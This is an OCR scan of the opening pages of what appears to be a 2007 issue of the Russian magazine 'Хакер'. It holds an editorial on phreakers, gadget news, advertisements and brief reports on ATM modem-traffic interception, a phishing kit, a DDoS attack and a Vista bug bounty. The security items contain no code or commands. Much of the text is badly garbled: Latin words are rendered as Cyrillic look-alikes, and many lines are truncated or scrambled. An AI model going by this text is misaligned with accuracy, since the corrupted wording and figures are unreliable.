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□ лубки проводов, кучи старого железа, паяльник, кани- 
фоль, выцветший старый осциллограф, модем на 
9600 бод и засохший еще в прошлом году сухарик, 

— именно с этим ассоциируется у большинства нор- 
мальных людей фрикерская романтика. Многие даже добавляют: 
ассоциировалась. Дескать, нетуже никакой романтики и фрикеров 
этих тоже уже нет. Всех поймали и все поголовно топчут целину где-то 
под Магаданом. 

Полная ерунда, приятель. Этим летом мне довелось познакомиться с 
вымирающим видом. Экземпляр попался хороший — он был высок, уг- 
рюм, а из его карманов торчали провода, осциллограф и скрученный 
пружинкой припой. Припой ему нравилось раскручивать и предлагать 
окружающим безнравственные вещи, вроде: «Давай подпаяем эти 
два провода к люминесцентной лампе, подключим ее кусилку, и онау 
нас взорвется!» или «Подпаяем магнетрон из микроволновки к\А/і-Рі 
антенне и будем жечь соседям телеки. Вот круто!». В общем, безумец. 
Для журнала — ценный кадр. 

К чему привело это мое знакомство, несложно догадаться. К самому 
фрикерскому в истории «Хакера» номеру. 

Наслаждайся! 
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Больше слов, 

больше музыки! 



Иокіа 5300 
Хрге55Ми5іс 

Поддержка наиболее 
распространенных 
музыкальных форматов 
Возможность закачать около 
1500 любимых песен, 
благодаря поддержке карт 
памяти объемом до 2 Гб 
Универсальный адаптер 
для наушников 
Отдельные клавиши 
для управления звуком 
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■ЕСТИТЕЛ ЬНЫИ 
КОРПУС ОМС^И 



приставкш<5Ііт» все чаще и чаще фигурирует в названиях компьютерных 
^^^^Итов. В общем, это хорошо — вся наша машинерия начинает занимать меньше места 
и выглядит при этом очень стильно. Вот и компания 6МС представила новый корпус форм-фак- 



| Ь «-. 




тора 5[іт АТХ, модель С-30. Ш 
меньше, чем у стандартных ко р| 
на такие размеры, в него можн 
места в нем хватает: 1 отсек 5 
ся без винтов). Вроде не много, 
7 слотов для плат и 4 ІІ5В-ра: 



ина этого вместилища компонентов всего 14 см, а высота на 8 см 
усов. Вотобщие габариты устройства: 140x435x360 мм. Несмотря 
/становить полноценную системную плату формата АТХ. Вообще 
и 3 отсека 3,5" (1 внешний и 2 внутренних, всеустройства крепят- 
о если подумать, то достаточно для всего необходимого, 
іа на корпусе тебе также несомненно пригодятся. В корпусуже 



СМС 

Л і -ги-иі 



установлен 350 Вт блок питания и 80 мм вентилятор на задней стенке. 




/№ср 0 




'Пс/ 
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а Ріег 




ДВА 

МИКРОГИГАБАЙТА 



Карты памяти сегодня распространены повсеместно: компьютеры мобильные, ком- 
пактные и настольные; разнообразнейшие плееры; сотовыетелефоны; фотоаппа- 
раты и многое другое. Столь же велико и разнообразие кардридеров: внутренние 
и внешние, большие и маленькие, разбирающие 10 и 50типов карточек. Чтобы 
хранить много музыки, нужна вместительная карточка, чтобы сделать много 
фоток — тоже, а еслиу тебя современныйтелефон, оснащенный плеером, фото- 
и видеокамерами, то без 2 Гб карты памяти ТгапвСепб формата МісгоЗОтебе просто 
не обойтись. Она имеет адаптер для работы в стандартном слоте 50, пожизненную 
гарантию и поддержку Вес иге Оідііаі Мивіс Іпібабѵе (те, кому нужно, знают, что 
это такое). Такчто направляйся в магазин! 




ѴѴІЫ00ѴѴ5ѴІ5ТА 
НА МАЛЫШЕ 



Несмотря на то чтоѴѴІпбоѵѵзѴівчв занимает на жестком диске места 
больше, нежели ее предшест|еѴшцы,1% можно установить на самый 
мфенький в мире комп — ОСКжпѴіеІМ^і который весит 450 г (его габариты 
— 14,6x8,38x2,54 см) и помещаетеѴілрман. Модель поставляется с 1,5 ГГц 
юцессором ѴІАС7М, жестким ди^Им объемом 60 Гб, 1 ГбОЗУ,атакжебло- 
м для работы с беспроводными семми. В него входят йсем известные ѴѴІ- 
і, В1ие1оо1;Ь, а также интерфейс ЕѴ-ИоѴѴІгеІеззѴѴАМ. Пою щая, чт о работа 
дороге — это важно, но в конце і^іцов все приезжают на свЪ^Дщ)вое 
место, производитель снабдил 
тать с полноразмед^ш дисплв 
к пдрводным сафА, а^^^брав 
догю5лнитеЛ*ой синхрониЯи^'Іакже в н 1 
щелевой 3| 
кошт[у( 

1 



док-станцией, которая поз врй^йрабо 
ии, клавиатурой, м^мШ^юдключ^ься 
всесвоАфайлы и приложения в доДи^без 1 

ВХОЛИТіМИ^ИЖ шШ^ВОІ С' 

ітоустрои^вба ключ ено в прбЧныі 
,ена всего это го удовольствия начинается от 
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время надежны* решений 



ИЗДАНИЕ 1 - НОМЕР 1 



ѴѴІпбоѵѵз 5егѵег 2003 



ЛОНДОНСКАЯ ФОНДОВАЯ БИРЖА ВЫБИРАЕТ ШІИ00ѴѴ8, 
А НЕ игшх ПО СООБРАЖЕНИЯМ НАДЕЖНОСТИ 



Том Нэги для “Времени надежных решений ” 

ЗДАНИЕ ГЛАВНОГО ОФИСА Лондонской фондовой 
биржи, расположенное на площади Патерностер, Лондон. 

СЛОВО ЛЕСТЕРУ: КІЯНКИ 

«Мы рассмотрели множество 
различных платформ, способных I 
удовлетворятъ нашей 
технологической специфике, 
и сравнили возможности этих 

платформ с потребностями \ тИ’ г 

нашего бизнеса. Выбор ѴѴіпсІоѵѵз 

Зегѵег был очевиден». Т 

Дэвид Лестер, директор по информационным І Г 

технологиям Лондонской фондовой биржи 



Надежность - ключ 
к “мировому рынку капиталов” 

Майкл Беттендорф 



Лондон, октябрь 2006 г. - 
Если информационная 
система должна ежедневно 
обрабатывать 15 миллионов 
сообщений в реальном 
времени с пиковой нагруз- 
кой - 2000 сообщений 

в секунду, значение имеет 
даже секунда простоя. 
Именно с такой задачей 
столкнулись работники 
Лондонской фондовой 
биржи при создании 
системы Іпіоіесі, предназна- 
ченной доставлять инфор- 
мацию о биржевых данных 
в реальном времени. 

Решить такую задачу без 
обеспечения стопроцент- 
ной надежности было бы 
невозможно. «Надежность - 
один из важнейших 
атрибутов технологических 
систем биржи. Бизнес 
требует, чтобы эти системы 
работали постоянно - 24 часа 
в сутки, 7 дней в неделю, - 
говорит директор по 
информационным техно- 
логиям Дэвид Лестер, 
руководивший сравнитель- 
ными испытаниями Ьіпих 
и \ѴшсІо\ѵ8 8егѵег при 
работе с основными техно- 



логическими системами 
биржи. - Мы рассмотрели 
множество различных 
платформ, способных 

удовлетворять нашей 

технологической специфике, 
и сравнили возможности 
этих платформ с потреб- 
ностями нашего бизнеса. 
Выбор АѴіпбот 8егѵег был 
очевиден». 

По мнению Лестера, 
долгосрочная надежность 
определяется техническим 
уровнем решения и проч- 
ными взаимоотношениями 
с поставщиком: «Мы искали 
серьезных партнеров, 

которые смогли бы предо- 
ставить необходимые нам 
конкретные технологичес- 
кие решения. Именно это 
и предложил МІСГ080Й». 

Подробнее ознакомиться 
с опытом Лондонской 
фондовой биржи и другими 
практическими примерами, 
а также с результатами 
независимых исследований 
сравнительной надежности 
\Ѵіпёо\ѵ8 8егѵег и Ьіпих 
можно на сайте 
\ѵ\ѵ\ѵ.тісго8оН.сот/ги8/ 
§еийе1асІ8 



НОВОСТЬ ДНЯ: Лондонская фондовая биржа 
добилась рекордных показателей надежности 

Дэвид Лестер (на фото слева) , директор по информационным 
технологиям Лондонской фондовой биржи, отмечает 
ключевую роль \УіпсІо\У8 8егѵег в поддержании стабильности 
и производительности системы. Продолжение на 3 стр. 









Реклама 



© 2007 МІ 0 ГО 8 ОЙ Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгозоЛ и\Ѵіпс1о\ѵ8 8егѵег, зарегистрированных на территории США и/или других стран, и владельцем авторских прав на их дизайн является корпорация МісгокоЛ. 
Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками соответствующих владельцев. 
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БАНКОМАТ 
МРЗ-ПЛЕЕРОМ 









> Неуязвимый он только снаружи 

Британский горе-хакер Максвелл Парсонс сел 
за решетку на 2,5 года за взлом банкоматов с по- 
мощью трЗ-плеера и специального софта. На- 
ходчивый парень подключал свой плеер к теле- 
фонным линиям, по которым с помощью модема 
банкоматсвязывался с процессинговым цент- 
ром одного их банков. Плеер записывал звуки 
на линии, которые впоследствии демодулиро- 
вались специальной программой, написанной 
украинскими напарниками хакера. 

Чтобы разобраться, какадминистраторы банка 
до пустил и та кой маразм, мы обратились к серь- 
езным дядям в костюмах. 

«Перехват модемного трафика и его последу- 
ющий анализ — далеко не новая технология из 



«шпионского» арсенала, — говорит Алексеи 
Раевский, генеральный ДирщторЗасигІТ. — 
Банкоматы обмениваются с банком инфор- 
мацией по специальному протоколу, который 
позволяет не передавать РІЫ-код в открытом 
виде. Это определяется требованиями соот- 
ветствующей платежной системы. Однако вся 
остальная информация, в том числе номер 
карты, имя владельца и т.д., может переда- 
ваться в открытом виде — это уже на совести 
производителей банкоматов и ошутствующего 
ПО». По мнению Алексея Ра4вскогр, в этом 
случае возможность перехва^і модемного 
трафика не учитывалась, посі^льку обычная 
двусторонняя аутентифи-кация с выработкой 
одноразового сеансового клЖ^ипоследующее 
шифрованиетрафика этим ключом позволили 
бы избежать подобной проблемы. 

Как считает Иван Плазачев, глава российского пред- 
ставительства С Иго по Рау В. V., все да иные от банко- 
матов передаются в зашифрованном виде, сейчас 
для этого повсеместно применяется 1024-битное 
шифрование. Единственная возможность взлома 
— это получить доступ к ключам шифрования. Ско- 
рее всего, у бандитов была инсайдерская инфор- 
мация или кто-то из них работал в банке. 

Как бы там ни было, факт остается фактом: 
трЗ-плеер можно использовать не только для 
прослушивания музыки :). 



8000 

!А ВЗЛОМ 
ѴѴІЫ00ѴѴ5ѴІ5ТА 



Американская компания Юеіюпсе, занима- 
ющаяся зесигііу-бизнесом, объявила кон- 
курс«Взломай Висту/ІЕ 7.0 и получи 
8 тысяч долларов». Этот конкурс станет частью 
программы «Деньги за уязвимость» (рау-Іог- 
йаѵѵ), целью которой является улучшение 
систем безопасности наиболее популярного 
софта. Приз в 8 тысяч долларов получаттолько 
6 умельцев, которые раньше всех пришлют 
результаты своей хакерской деятельности 
специалистам ійе^епсе. 

Длятого чтобы получить денежное вознаграждение, 
имо, чтобы обнаруженной уязвимостью 
ыло воспользоваться с удаленного 
ьютера, причем она должна присутствовать 
х последних обновления и дополнениях 



к ІЕ или Ѵізіа. Ошибки, найденные в бета-вер- 
сиях продуктов, поощряться вознаграждением 
не будут. 

В настоящий момент Юеіюпсе далеко не 
единственная компания, согласная пла- 
тить хакерам деньги за поискуязвимостей 
в программах. Так, некоторое время назад 
Тгепб Місго организовала подобный конкурс 
с призовым фондом в 50тысяч долларов. На- 
града досталась хакера-м, сумевшим обнару 
житьуязвимості 

Вся эта идиллия тся простым 

соображение® ;р найдет стоящий 

баг, он сможеіТ ЩШ/ю зараб охат ьі 

помощью куда (: Ікчтоэ 

целесообразна) 'Т'весьмаус. 

Л: 





Пм.мрч РИИ 1 


іідг* 




ИвХсоя* Іо Ьіл№ 
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► Качественный фейкодного из банков 

новый 

ИНСТРУМЕНТ 

ФРОДЕРОВ 

Эксперты компании Р5А обнаружили, что 
мошенники продают и используют новый набор 
программ для фишинга Мап Іп ТЬе МісІсИе. 

Он даетфродерам возможность продвигать 
сложные схемы фишинга в дополнение 
к ста н да ртн ы м , чтоб ы п ол уч ить доступ к да н н ы м 
потребителей. 

Эта программа для одних является 
гениальной, а для других — шокирующей. С по- 
мощью простого поддельного письма пользо- 
ватель направляется на поддельный сайт, где 
он видитточную, зеркальную копию атакуемого 
сайта. Например, ты кликаешь по линку из 
письма мошенника, чтобы получить информа- 
цию отсвоего онлайн-банка. Как только стра- 
ница загружена, ты видишь в точности то, что 
ожидаешь, — сайт банка во всей красе. Трюк 
фродеров состоит в том, что программа ис- 
пользуетспециальныетуннели для создания 
точной копии атакуемого ѵѵеЬ-сайта и постоянно 
обновляет информацию об изменениях, проис- 
ходящих на нем. 

В прошлом году фишинговой атаке 
тап-іп-іЬе-тісІсІІе подверглись корпоративные 
клиенты СіііЬапк. Фейковый сайтуправлялся из 
России. Вскоре он был нейтрализован. 
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3 года 
гарантии 

ѵѵѵѵѵѵ.депіиз.ги 




Колонки 

Сепіиз 5Р-НР1250Х 40ѵѵ 



Игровая 
лазерная мышь 
Сепіиз Иаѵідаіог 535 



Игровой руль Сепіив Тгіо Касег РР 



В 



МАГАЗИНАХ 




Москва 

ѵѵѵѵѵѵ.иіігасотр.ги ѵѵѵѵѵѵ.ІЛТПА-опІіпе.ги 
(495) 775-7566 
м. Отрадное Юрловский проезд, д. 13 
м. Коломенская ул. Коломенская, д. 17 

Санкт-Петербург 

зрЬ.иКгасотр.ш зрЬ.ШТПА-опІіпе.ги 
(812) 336-3777 

м. Кировский завод ул. Возрождения, д.20А 

Интернет-магазин 

с доставкой по территории РФ 
ѵѵѵѵѵѵ.ІЛТПА-Ведіопз.ги 



Интернет-портал 

для корпоративных клиентов: 

ѵѵѵѵѵѵ. II І_ТВА-согр. ш 

1Л.ТВА СІиЬ: 

программа поощрения постоянных клиентов 
сІиЬ.иІІгасотр.ги 

Для оптовых клиентов: 

ѵѵѵѵѵѵ. сіеаіегз.иіігасотр.ги 
(495) 790-7535 
с1еа1егз@и11гасотр.ги 



КОМПЬЮТЕРНАЯ 

ТЕХНИКА 



АУДИО-ВИДЕО 
И МОБИЛЬНАЯ СВЯЗЬ 



ОБОРУДОВАНИЕ 
ДЛЯ ОФИСА 



БЫТОВАЯ ТЕХНИКА 
И ЭЛЕКТРООБОРУДОВАНИЕ 



Товар сертифицирован. Реклама. 
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ЗАДОСИЛИ 
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Всероссийские 

учения 

Угроза террористической 
атаки на транспорте в 
российских города* но 
оправдалась. То ли сир ое к 
спугнули террористов, то ді 
угрозы... 




ПОЛИТИКА 



Санитарный контроль Эстонии 

Госдума призвала президента рассмотреть волк 

об экономических санкциях е отношении Эстокиі 




ОБЩЕСТВО 



іе:4І 



> Атакованный хакерами сайт 



Информационный портал «Газета. Ри» недавно подвергся массирован- 
ной ООоЗ-атаке, которая вынесла авторитетный ресурс в аут. Админы 
«Газеты» уточнили, что в течение полутора часов их ресурс флудила це- 
лая куча ботов из американских и европейских сетей. К такому агрессив- 
ному поведению ботов они оказались не готовы: на полтора часа ресурс 
лег в даун. 




КРУТОЙ ТЮНЕР 



Все больше и больше устройств стремятся быть подключенными 
к ПК, одновременнооставаясьотнего независимыми. И если рань- 
шеэто были оптические приводы, умеющие проигрывать фильмы 
и музыку без загрузки операционной системы, то теперь сюда доба- 
вился внешний ТВ-тюнер ВеЬоІбегТѴ 5оІо. Это симпатичный внешний 
девайс, который покажет твои любимые «Спокойной ночи, малыши» да- 
же без включения системного блока, достаточно нажать «Роѵѵе г» на 
мониторе. Стоит добавить, что одним ТВ дело не ограничивается 
— тюнер ловиттакже УКВ- и РМ-радиостанции. Поддерживается 
разрешениедо 1680x1200, функция РісШге-оп-Оевкіор, индивидуаль- 
ные настройки для каждого канала (будьто радио или ТВ), регулировка 
уровня шумоподавления, таймер включения и выключения. Имеется 
также пультдистанционного управления и меню на русском и английс- 
ком языках. 



Н 15 ПОДДЕРЖИВАЕТ ВЫЛАЗКА В МИР 

АбР'ШНИКОВ АДРЕНАЛИНА 



Помнишь, каксовсем недавно ты собрал себе крутейший комп на 
основе графической шины АѲР. Он полностьютебя устраивал и устраи- 
вает сейчас, но вот беда — производительность видеоподсистемы уже 
не тянет. Не тянет современные игры, которыетебе ну оченьхочется 
запустить. Что же делать? Менять все? Но это слишком дорого, да 
и не нужно, ведь все остальные компоненты вполне могутеще 
работать. Отчаиваться не стоит— решение нашла компания НІ5, выпус- 
тив плату на чипе АТІ РабеопХ1950 РРО с системой охлаждения ІсеОЗ 
и интерфейсом А6Р Эта плата наверняка оживиттвою систему, а мощная 
и тихая, но занимающая 2 слота система охлаждения не позволитей 
сгореть. Платы будут выпускаться в двух вариантах, различающихся 
количеством установленной памяти- щ ^ ^4^Мб ООРЗ. ТакчтоАСР 
снова в «игровом строю»! 




Недолго нам стобой осталосьзимоваты скоро заканчивается последний 
календарный месяц зимы, и вместе с появлением весеннего солнышка 
нам придется высунуть нос туда, где делается настоящая история. 

10 марта в Москве произойдет событие, о котором еще долго будет шу- 
меть сеть. Абгепаііп багшез — это пока не компьютерная игрушка, но име- 
ет все шансы ею стать. Это Зимние Международные Игры экстремальных 
видов спорта, которые соберут несколько тысяч экстремалов и сотни 
жаждущих увидеть ихтрюки. Такое шоу в Москве показывали пока разве 
что на мониторах: звезды сноуборда и ньюскула со всего мира и лучшие 
русские райдеры, нереальные вылеты и приземления. 10 марта 
виртуальная реальность экстремальных игр станетэкстре- 
мальной реальностью Игр в Москве. До 10 марта еще есть 
время, можно последить за развитем событий оп-ііпе на 
ѵѵѵѵѵѵ.абгепаііпдатез.ги . С наступлением же весны, сле- 
дует готовить вылазку в мир адреналина. 
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ТОВАР СЕРТИФИЦИРОВАН 



ЦЕНТР ДОМАШНИХ 

МУЛЬТИМЕДИА 

РАЗВЛЕЧЕНИЙ 

Персональный компьютер ФРОНТ Т-90 (600) на базе передовой 
разработки компании Іпіеі, процессора нового поколения Іпіеі® 
Соге™ 2 йію - это потрясающее быстродействие в обработке 
информации и максимальная производительность, 
обеспечивающие комфортную работу сразу с несколькими 
ресурсоемкими приложениями и возможность наслаждения 
новейшими разработками мультимедиа-индустрии. 








ФР'кНІ 



технология 

повеаы 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Ріаіодіс, ЕІЬегЕхргезз, ЕТОХ, РІазМРІІе, І386, І486, І960, ІСОМР, ІпзІапІІР, Іпіеі, логотип Іпіеі, ІпІеІ386, ІпІеІ486, ІпІеІ740, ІпІеЮХ2, ІпІеЮХ4, ІпІеІ5Х2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. Ьеар аМеаб., логотип Іпіеі. Ьеар аЬеаб., Іпіеі МеІВигзІ, Іпіеі ЫеІМегде, Іпіеі ЫеіЗігисІиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗіер, Іпіеі ЗігаІаРІазЬ, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЬІпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵеЮгіѵе, Рагадоп, РОСЬагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Ѵоиг Соттапб, Репііит Іпзісіе, зкоооі, Зоипб Магк, ТЬе Сотриіег Іпзісіе., ТІпе боигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



НА ПРАВАХ РЕКЛАМЫ 
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МИНИМАЛИЗМА 

В наш век, когда все становится меньше и меньше, тенденция 
миниатюризации захватила даже... автомобили! Так, китай- 
ский дизайнер Пэтти Юань предложила л и шить авто пары 
колеси всех дверей, попутно превратив утилитарное средство 
передвижения в образец искусства и украшение города. 
Дизайн суперавто Сатрег БоШб построен по типу: одна ось, 
пара кресел, электромоторы и корпус-хамелеон. 

В глаза, конечно, сразу бросается футур истинность 
машины. Длина этого малыша составляет 1 ,3 метра, ши- 
рина — 1 ,4, высота — 1 ,55. Доступ в нее открываетлобовое 
стекло, соскальзывающее вверх и назад. Внутри — пара 
кресел, установленных боко бок. За их спинками расположен 
крохотный багажник на пару кейсов или сумокс продуктами. 
Устойчивость в движении на одной оси обеспечитэлек- 
троника с гироскопами, такая как на самокате Зедѵѵау. А на 
стоянке сзади кабины выдвигается упор. 

Питаться аппарат будет от электричества. При этом І_оіи5 
можно будет подзаряжать от домашней розетки! Небольшие 
размеры и вес машины должны обеспечитьей низкий рас- 
ход электричества, а значит, ей потребуются сравнительно 
небольшие и более-менее дешевые аккумуляторы. 
Электромобиль І_оІи5 должен появиться на рынке как новый 
продукт и бренд испанской компании Сатрег, хорошо 
известной, прежде всего, свой обувью, а также проектами 
в других областях. 

Пэтти позиционирует машину в первую очередь как фетиш- 
продукт. Но, кто знает, возможно, такое миниатюрное реше- 
ние позволит немного разгрузить магистрали будущего. 



ПЛАНШЕТКА 



>До этого Дэвиду Саваджу смогли пришитьтолько одну руку 



РИШЬЕТ 

ТЕБЕ ДОКТОР 
НОВЕНЬКИЕ РУЧКИ... 

Хирургия не стоит на месте! Она сделала качественный скачокот пересадки кожи 
с ягодиц на лицо до пришивания отдельных конечностей! Так, 47-летней колумбийке 
Эльбе Люсии взамен давно ампутированных рук пересадили новые. Этутяжелую 
1 0-^асовую операцию выполнили хирурги Із госпиталя в Валенсии. 

Операция состояласьЗО ноября, а уже в джабре женщина благополучно выписалась 
из больницы. Без рукЛ юсия провела 28 л^эт, прошедших после взрыва в химической 
лаборатории, который и сделал ее инвалидом. 

уки Люсии начин ают ся с места; расположенного немного выше локтя. Их хи- 
чогли взятьу женщины, которая фактически погибла в результате несчастного 
сличая: медики признали, что ее мозг мертв. 

Ампутированные руки донора были охлаждены и менее чем за 5 часов доставлены 
в операционную, где и была проведена операция. Пересадка правой и левой рук 
проходила одновременно. Ею занималось 1 0 человек. 

Для соединения костей в них были установлены металлические пластины 
и винты, а микрохирургия позволила соединитьартерии, вены и нервы. 





Планшетный ноутбук — это стильно и необычно. Ты согласен? Если да, то компания 
Бепоѵо выпустила новинку — ТЫпкРаб Х60 ТаЫеі, ноутбук-трансформер, — именно для 
тебя. Вторая часть слова «ноутбук-трансформер» указывает на функцию враща- 
ющегося дисплея, которой ты наверняка поразишь окружающих. По нему можно 
ударить — все будет в порядке, экран имеет 12 дюймов ударопрочной антибликовой 

поверхности, которая можетуправлять- 
ся как стилусом, таки пальцем. Угол обзора 
на нем составляет 170 градусов, а разре- 
шение — в стандарте 5Х6А+. Беспро- 
водная связь представлена адаптером 
ѴѴІ-ЕІ 802.1 1 п. Из приятных особен- 
ностей стоит отметить совместимость 
с ѴѴІпсІоѵѵБѴІБІа, наличи 
микрофона, а та 
функцию: при 
автоматичес 
режима. 
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ОТЕЦ ТЕОРИИ 
ЧЕРНЫХДЫР 
ПОЛЕТИТ в КОСМОС 




Всемирно известный астрофизик Стивен Хоукинг (БіерЬеп Наѵѵкіпд) 
сделал заявление о том, что в этом году планирует совершить полет в не- 
весомости на самолете, а в 2009-м — отправиться в космос. Несмотря на 
своетяжелоезаболевание, Стивен Хоукингсобирается продолжить на- 
учную работу и после полета в космос. Основные научные исследования 
ученого касаются черныхдыр, геометрии пространственно-временного 
континуума и необратимых процессов во вселенной. 

Хоукинг надеется, что реализовать эту идею ему поможетбританский мил- 
лионер сэр Ричард Брэнсон, руководитель компании Ѵігдіп Эаіасбс. Среди 
ближайших крупных планов фирмы — запуск корабля БрасеБЬІрТѵѵо. Этот 
корабль должен будет в 2009 году с 6-ю пассажирами на борту полететь 
по суборбитальной траектории. Там участникам путешествия будетобес- 
печена возможность некоторое время побыть в невесомости. Стоимость 
этого двухчасового полета составляет около $200 тысяч, однако Брэнсон 
выразил готовность спонсировать путешествие Хоукинга. 

На днях всемирно известному астрофизику исполнилосьбб лет. Он стра- 
даетбоковым амиотрофическим склерозом и прикован к инвалидному 
креслу. С миром Хоукинг может общаться только с помощью специально- 
го синтезатора речи, являющегося основной частью его кресла, в кото- 
ром он проводитпочти все время. 



> Стивен Хоукинг 



ПРЕДСТАВЛЯЕТ 

ІРНОЫЕ 





Глава Арріе Стив Джобс после Нового года подготовил крупный 
анонс. Арріе решила не мелочиться и заявила сразу 3 новых продукта 
в одном — телефон, КП К и широкоэкранный видеоплеер! 

Внешне ІРЬопе больше всего напоминает концепт-изображения 
теперьуже мифического широкоэкранного плеера от Арріе. Тончайший 
1 1 ,6-миллиметровый корпусукрашаютогромный 3,5-дюймовый сенсор- 
ный экран и одна-единственная кнопка! Арріе полностью отказалась от 
неуклюжих клавиатур. Для управления не нужно пользоваться стилусом 
— достаточно однихлишь пальцев. Запатентованная технология отлича- 
ется удивительной точностью, регистрацией сразу нескольких одновре- 
менных нажатий и полным игнорированием случайных прикосновений 
к поверхности экрана. 

В ІРЬопе имеются встроенные динамики, удобный фотоальбом и встро- 
енная двухмегапиксельная камера. Работать со звонками здесьтакже 
удобно, каки в любом другом телефоне. 

Сщхро^зировав данные с компьютером и отредактировав адресную 
кн^у, ты легко сможешь обнаружить нужный номер, позвонить, устроить 
те^фоннуУконференцию, создать голосовое или видеосообщение. На- 
шелі^ый номер — к твоим услугам потрясающе красивая виртуальная 
цифровая клавиатура. 

ІРЬопе поддерживает Ѳ5М, ЕБЭЕ, ВІиеІооіЬ и ѴѴІ-Еі. Арріе сдела- 
ла реальностью полноценную работу с интернетом на карманном 
устройстве. Благодаря браузеру Баіагі на экране полностью помеща- 
ются крупные сайты; пальцемты клацаешь по ссылкам, увеличиваешь 
или уменьшаешь масштаб, выбираешь необходимую информацию. Име 
ется большой набор сетевых сервисов (Ѳоодіе Марз, УаЬоо 
.аі^ѴАсІдеіз). Работа с электронной почтой, при сохранении высоко 
иональности, также была максимально упрощена, 
и объявлены сроки выхода и цены на это чудо. 4-гигаба 
Кпе стоит $500, а 8-ги га байтная модель — $600. Но при 
іны указаны с учетом оформления двухгодичного контра 
атором Сіпдиіаг. Первыми модель увидят жители США — 
ойдет в июне 2007 года. Найти ІРЬопе в европейских ма 
ожно будеттолько к концу этого года. 
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АТЫ СЛУЖИЛ 



В КОСМОДЕСАНТЕ? 



Вполне возможно, что через 25 летморпехи СШАсмогут 
приземляться в любой точке земного шара меньше чем 
через 2 часа после старта с территории Америки без необ- 
ходимости договариваться о проходе самолета через чье-то 
воздушное пространство. Это позволит сделать новый тип 
системы высадки из космоса. 

Согласно нормам международного права, воздушное 
пространство государства распространяется на 80 кило- 
метров от поверхности Земли. Перепрыгнуть через эту зону 
— значит, обойти необходимость получения разрешения 
на пересечение воздушного пространства от каких бы то 
ни было стран — союзников, враждебных или нейтральных. 
Суть проекта состоит в следующем: 10-15 морпехов и 2 
пилота садятся на бортЗизіаіп — стреловидного субор- 
битального аппарата. Зизіаіп подвешивают под брюхо 
самолета-разгонщика, который поднимаетего на высоту 
нескольких километров и сбрасывает. Для набора скорости 
Зивіаіп должен использовать комбинацию прямоточного 
воздушно-реактивного и ракетного двигателя. Последний 
должен забросить машину по параболе намного выше 
тех самых 80 километров. После планирования по огром- 
ной дуге на расстояние до 1 1 тысяч километров Зизіаіп 
должен приземлиться, опираясь на свои крылья. 

Серийные образцы десантного челнока можно было бы пос- 
троить к 2030 году, тем более что Конгресс идею одобрил. 



> Настоящий космодесант 
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искусстве^И 

■а-имплант 



Близоктот день, когда і^^^Итории достаточно быстро будут выращивать кожу 
нужного размера^^^^Исчтобы она не отторгалась, использовать при культивиро- 
^^НЖи пациента. 

предложил Стивен Бойс из университета Цинциннати. Его при- 
менение позволит вырастить крошечный фрагмент кожи больного до размеров, в 100 
раз превышающих исходный. 

Но и этот метод не без проблем: пока культивированная кожа не приживется, пока 
в ней не прорастут мельчайшие сосуды, поставляющие вместе с кровью и агентов им- 
мунной системы, медикам придется накладывать на поверхность новой кожи антибак- 
териальные повязки. Коллега Бойса Дороти Сапп придумала выход из ситуации: она 
подвергла клетки кожи генетической модификации, в результате которой они стали 
производить намного больше антибактериального белка, известного под названием 
дефенсин ИВБ4. 

Но прежде чем проводить первые клинические пересадки кожи, исследователи 
проверят этот метод на животных. В настоящее время проведены опыты лишь с отде- 
льными клетками. Их результаты показали, что они действительно генерируютболыше 
нужного для защиты белка, что теоретически придает выращенной коже больше 
защитных свойств в адаптационный период. 




> Клетки кожи с повышенным содержанием защитного белка 




> Образец напечатанной ткани 



ПЕЧАТАЕМ 

ОРГАНЫ 



НАПРИНТЕРЕ 



Американские ученые смогли приспособить струйный прин- 
тер для печати «чернилами», содержащими фактор роста 
стволовых клеток. Таким образом, сделан еще один шаг на 
пути к печати органов на заказ. 

В своих опытах ученые использовали специальный 
струйный принтер, приготовив для него особые 
«чернила»: раствор, содержащий фактор роста ВМР-2, 
который провоцирует превращение стволовых клеток 
в клетки костной ткани. Они покрыли предметное стекло 
микроскопа фибрином и распечатали при помощи струйного 
принтера 4 отдельных квадратика со сторонами по 
750 микрометров. В каждом — своя «яркость краски», то есть 
концентрация ВМР-2. Далее пластинку положили в чашку 
Петри и равномерно нанесли на нее взрослые стволо- 
вые клетки, взятые из мускулов ног мышей. Стволовые 
клетки, оказавшиеся на участках с фактором роста, начали 
превращаться в клетки костной ткани. И чем больше была 
концентрация ВМР-2, тем выше оказывался «урожай» диф- 
ференцированных клеток. Стволовые же клетки, которые 
попали на чистыеучастки, превратились в мышечные 
клетки, из чего следует, что этот путь развития стволовая 
клетка выбирает по умолчанию. 

При этом можно создать та кую структуру подложки, в ко- 
торой один конец будет развивать кость, еще один 
— сухожилие, а третий — мускулы. Это обеспечит больший 
контроль над регенерациейткани. 

Ученые говорят, что могут напечатать и более сложные 
вещи. Однако уровень развития науки пока ограничивает 
возможность применения принтера. Прежде нужно более 
детально изучить строение и процесс формирования орга- 
нов человека. 




АРКИ 

ГОТОІ 



ЕСКИЙ «НЫРЯЛЬЩИК» 
">АБОТЕ! 



ученые из британсю^Горганизации по исследованию Антарктики 
обираются в номго экспедицию для исследования глубин океана близ 
цяного^^инента. Они будут использоватьдистанционноуправляе- 
'і ацЩэат І5І5, способный погружаться на 6,5 километров. 

ШШ Ри «старт/вой площадкой» -+ британским научным судном 
ис Кла|ж Росс» — субмарин^роботсоединяется 10-километ- 
'кабел^. З-тонныйаппаратие^т массу оборудования: фото- 
видеокамефі, сонары и т^^Он осІаЖн двумя «руками» для сбора 
образцов. ТакІщ^Ршжно оборудовав сетями и бурильной установкой, 
ия аппарата на чнетс^^ін варе 201)7- го и продлится 3 недели. 
і помощи І5І5 ученые намещны шучить дно в р айо не залива Марга- 
